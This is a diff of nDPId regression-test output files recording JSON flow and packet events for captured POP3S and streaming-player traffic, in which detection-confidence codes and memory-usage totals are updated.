@@ -4,8 +4,8 @@ 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614938117011,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938117011,"pkt":"AAAAAAAAAAgACwgJCABFAAA0BaxAAH8GIWTAqAABCgoKAdclA+N8RI7kAAAAAIACIACU+AAAAgQE7AEDAwIBAQQC"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614938117270,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938117270,"pkt":"AAAAAAAAAAgACwgJCABFAAA0AABAADMGcxAKCgoBwKgAAQPj1yVpzHIcfESO5YASchBmIQAAAgQFtAEBBAIBAwMH"} 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614938117298,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":238,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":238,"pkt_l4_len":204,"thread_ts_msec":1614938117298,"pkt":"AAAAAAAAAAgACwgJCABFAADgBbBAAH8GILTAqAABCgoKAdclA+N8RI7lacxyHVAYQTecFQAAFgMDALMBAACvAwNgQf\/5kgLNNRPYdtFiHEoPzfeU37\/0FcJ+JWxvuPQRAgAAOMAowCfAFMATAJ8AngA5ADMAnQCcAD0APAA1AC\/ALMArwCTAI8AKwAkAagBAADgAMgAKABMABQAEAQAATgAAABkAFwAAFHBvcC5zZWN1cmVzZXJ2ZXIubmV0AAoABgAEABcAGAALAAIBAAANABQAEgYBBgMEAQUBAgEEAwUDAgMCAgAXAAD\/AQABAA=="} 
-00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1614938117011,"flow_last_seen":1614938117298,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1614938117298,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"10.10.10.1","src_port":55077,"dst_port":995,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"POPS","breed":"Safe","category":"Email"}} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1614938117011,"flow_last_seen":1614938117559,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2704,"flow_avg_l4_payload_len":540,"midstream":0,"thread_ts_msec":1614938117559,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"10.10.10.1","src_port":55077,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"POPS","breed":"Safe","category":"Email"}} 
+00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1614938117011,"flow_last_seen":1614938117298,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1614938117298,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"10.10.10.1","src_port":55077,"dst_port":995,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"POPS","breed":"Safe","category":"Email"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1614938117011,"flow_last_seen":1614938117559,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2704,"flow_avg_l4_payload_len":540,"midstream":0,"thread_ts_msec":1614938117559,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"10.10.10.1","src_port":55077,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"POPS","breed":"Safe","category":"Email"}} 
00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5,"source":"pops.pcapng","alias":"nDPId-test","packets-captured":5,"packets-processed":5,"total-skipped-flows":0,"total-l4-payload-len":2704,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1614938117559} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5/5 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871644 bytes -~~ total memory freed........: 5871644 bytes -~~ total allocations/frees...: 118121/118121 +~~ total memory allocated....: 6005278 bytes +~~ total memory freed........: 6005278 bytes +~~ total allocations/frees...: 120883/120883 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 809 chars diff --git a/test/results/pps.pcap.out b/test/results/pps.pcap.out index 86ab59c52..afd9c8ef4 100644 --- a/test/results/pps.pcap.out +++ b/test/results/pps.pcap.out 
@@ -123,380 +123,380 @@ 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":921,"source":"pps.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1467353136439,"flow_last_seen":1467353136900,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":8362,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1467353136900,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.197.138.12","src_port":22793,"dst_port":6956,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138757,"flow_last_seen":1467353138757,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353138757,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1467353138757,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353138757,"pkt":"TF4M6gNlABxCjnAxCABFAAUUA1lAAIAGkOvAqHMIZePIC8UfAFBKp6EFWDmKmFAQ\/\/B9QgAAR0VUIC90cmFjazI\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"} 
-01395{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138757,"flow_last_seen":1467353138757,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353138757,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/track2?a=1&as=1;2,3;4,5&b=1467353138&c=ae87cb3cfdf494aa48dc608909f69250&cv=5.2.15.2240&d=5000000858874&dr=2175&f=4e3ae415a584748ac9aa31628f39d1e8&g=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&h=&i=qc_100001_100140&iv=0&j=31&k=180932301&kp=4e3ae415a584748ac9aa31628f39d1e8&n=479531000&o=1&p=1000000000381&q=5000000927558&r=c4889e64ad9d9eeb9ff438910850c442&rt=1467353113&s=aea56a808fc92ef360519121948e0f27&sv=4.10.004&u=1&up=&v=5000000859124&ve=1&w=2,3","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +01395{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138757,"flow_last_seen":1467353138757,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353138757,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/track2?a=1&as=1;2,3;4,5&b=1467353138&c=ae87cb3cfdf494aa48dc608909f69250&cv=5.2.15.2240&d=5000000858874&dr=2175&f=4e3ae415a584748ac9aa31628f39d1e8&g=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&h=&i=qc_100001_100140&iv=0&j=31&k=180932301&kp=4e3ae415a584748ac9aa31628f39d1e8&n=479531000&o=1&p=1000000000381&q=5000000927558&r=c4889e64ad9d9eeb9ff438910850c442&rt=1467353113&s=aea56a808fc92ef360519121948e0f27&sv=4.10.004&u=1&up=&v=5000000859124&ve=1&w=2,3","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":995,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1467353138757,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1467353138757,"pkt":"TF4M6gNlABxCjnAxCABFAADjA1pAAIAGlRvAqHMIZePIC8UfAFBKp6XxWDmKmFAY\/\/B4OwAAc2RuVjRiR2N1YUhSdGJBPT07IFFDMDA2PXU1NDl2cHoxMGw5ZmthdHVtNGFsdzRicDsgUUMwMDg9MTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE0NjY2NDU4MTYuMTsgSG1fbHZ0XzUzYjczNzRhNjNjMzc0ODNlNWRkOTdkNzhkOWJiMzZlPTE0NjY2NDU4MTc7IFFDMDA1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQoNCg=="} 
00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":996,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1467353138794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1467353138794,"pkt":"ABxCjnAxTF4M6gNlCABFAAEkTcBAAC8Gm3Rl48gLwKhzCABQxR9YOYqYSqemrFAYSdTGUAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM4IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAyDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCm9r"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138931,"flow_last_seen":1467353138931,"flow_idle_time":7580000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":653,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":653,"midstream":1,"thread_ts_msec":1467353138931,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01323{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1467353138931,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":707,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":707,"pkt_l4_len":673,"thread_ts_msec":1467353138931,"pkt":"TF4M6gNlABxCjnAxCABFAAK1A3VAAIAG1W7AqHMIe31wMcUgAFAUdsqc+xrYh1AYQTe7PAAAR0VUIC9jbGs\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"} 
-00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138931,"flow_last_seen":1467353138931,"flow_idle_time":7580000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":653,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":653,"midstream":1,"thread_ts_msec":1467353138931,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"click.hm.baidu.com","url":"click.hm.baidu.com\/clk?53e25e33e064c657c06b558e5c3c33fd","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138931,"flow_last_seen":1467353138931,"flow_idle_time":7580000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":653,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":653,"midstream":1,"thread_ts_msec":1467353138931,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"click.hm.baidu.com","url":"click.hm.baidu.com\/clk?53e25e33e064c657c06b558e5c3c33fd","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
01370{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1467353139050,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":744,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":744,"pkt_l4_len":710,"thread_ts_msec":1467353139050,"pkt":"ABxCjnAxTF4M6gNlCABFAALaH2hAAC0GDFd7fXAxwKhzCABQxSD7GtiHFHbNKVAYADhuxwAASFRUUC8xLjEgMzAyIEZvdW5kDQpMb2NhdGlvbjogaHR0cHM6Ly95b3V0dS5iZS85b3ZjSndDN0FFYw0KU2V0LUNvb2tpZTogSF9NS1RfQ0xLSUQ9MDAwMDAwMDE1OWRhMTZiODU3NzYwODMyNWEwOGEzNzYwMDAwMDAyMDM1MzM2NTMyMzU2NTMzMzM2NTMwMzYzNDYzMzYzNTM3NjMzMDM2NjIzNTM1Mzg2NTM1NjMzMzYzMzMzMzY2NjQwMDAwMDAwODc5NmY3NTc0NzUyZTYyNjU7IFBhdGg9LzsgRG9tYWluPWhtLmJhaWR1LmNvbTsgRXhwaXJlcz1GcmksIDAxIEp1bCAyMDE2IDA2OjM1OjM4IEdNVA0KU2V0LUNvb2tpZTogSF9NS1RfQ0xLTE9HPTAwMDAwMDAxNTlkYTE2Yjg1Nzc2MDgzMjVhMDhhMzc2MDAwMDAwMjAzNTMzNjUzMjM1NjUzMzMzNjUzMDM2MzQ2MzM2MzUzNzYzMzAzNjYyMzUzNTM4NjUzNTYzMzM2MzMzMzM2NjY0MDAwMDAwMDg3OTZmNzU3NDc1MmU2MjY1OyBQYXRoPS87IERvbWFpbj1obS5iYWlkdS5jb207IEV4cGlyZXM9RnJpLCAwMSBKdWwgMjAxNiAwNjozNTozOCBHTVQNClAzUDogQ1A9IkNVUmEgQURNYSBERVZhIFBTQW8gUFNEbyBPVVIgQlVTIFVOSSBQVVIgSU5UIERFTSBTVEEgUFJFIENPTSBOQVYgT1RDIE5PSSBEU1AgQ09SIg0KQ29ubmVjdGlvbjogY2xvc2UNCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM4IEdNVA0KU2VydmVyOiBhcGFjaGUNCg0K"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139305,"flow_last_seen":1467353139305,"flow_idle_time":7580000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1467353139305,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1467353139305,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1467353139305,"pkt":"TF4M6gNlABxCjnAxCABFAAEKA4dAAIAGQVvAqHMIy0K2GMUiAFDWCs3i1IWCxVAYAQQdEwAAR0VUIC9vY3NwL01Fa3dSekJGTUVNd1FUQUpCZ1VyRGdNQ0dnVUFCQlR5NEdyNWhZb2RqWENiU1JramVxbTFHaWglMkJaQVFVU3QwR0ZodTg5bWkxZHZXQnRydGlHcnBhZ1M4Q0NFWXJGWGtxMnVneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IE1pY3Jvc29mdC1DcnlwdG9BUEkvNi4xDQpIb3N0OiBjbGllbnRzMS5nb29nbGUuY29tDQoNCg=="} -00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139305,"flow_last_seen":1467353139305,"flow_idle_time":7580000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1467353139305,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"clients1.google.com","url":"clients1.google.com\/ocsp\/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih%2BZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCEYrFXkq2ugz","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/6.1"}} 
+00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139305,"flow_last_seen":1467353139305,"flow_idle_time":7580000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1467353139305,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"clients1.google.com","url":"clients1.google.com\/ocsp\/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih%2BZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCEYrFXkq2ugz","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/6.1"}} 01465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1000,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1467353139309,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":813,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":813,"pkt_l4_len":779,"thread_ts_msec":1467353139309,"pkt":"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\/Ds15nk8Y2Znhsf4SdVmf8GlloCQ6IXimfBklwRGn8\/72t77ZQLcabmXBFNBqyfqmRrW1O7lFh1alLxLnbN6PNKIPNv7dkTJVq4NRpJC1H3sykeA3XbH5EEaxhdvWFd1bsvybTiEgn7Bn5bpdXlExvoxRYuc7MLXQAUHRWSGKZpv+UniRokZRHgZy2GbGkQE8sf0PVCXrNjm4qsIXnQvqrF2J2xxFQ5x1wzU7J9l9Av+bPvuQI2mdLqvQskYq3tOxhJ6prFG9fcqt4lJS5E11mkG9tPXiAq"} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139505,"flow_last_seen":1467353139505,"flow_idle_time":7580000,"flow_min_l4_payload_len":575,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":575,"midstream":1,"thread_ts_msec":1467353139505,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01219{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1467353139505,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":629,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":629,"pkt_l4_len":595,"thread_ts_msec":1467353139505,"pkt":"TF4M6gNlABxCjnAxCABFAAJnA5RAAIAG6ATAqHMIymwO28UjAFBUZatTb7o85VAYAQQGIwAAR0VUIC9jb3JlP3Q9MTEmY3Q9YWRzdGFydCZzdGFydHRtPTEwOTcmcmVzZXQ9MSZyYT0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxMTkmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} 
-01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139505,"flow_last_seen":1467353139505,"flow_idle_time":7580000,"flow_min_l4_payload_len":575,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":575,"midstream":1,"thread_ts_msec":1467353139505,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adstart&starttm=1097&reset=1&ra=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353119&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139505,"flow_last_seen":1467353139505,"flow_idle_time":7580000,"flow_min_l4_payload_len":575,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":575,"midstream":1,"thread_ts_msec":1467353139505,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
